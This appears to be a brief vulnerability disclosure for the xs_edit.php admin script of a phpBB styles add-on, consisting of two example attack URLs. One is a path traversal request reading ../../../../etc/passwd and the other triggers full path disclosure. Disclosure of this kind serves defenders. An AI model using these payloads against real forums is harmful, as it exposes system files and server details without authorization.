Site: http://www.phpbbstyles.com/ 1. Remote File Content Disclosure http://forum/admin/xs_edit.php?edit=../../../../etc/passwd 2. Full Path Disclosure http://forum/admin/xs_edit.php?edit=&viewbackup=1 http://wtf.bz/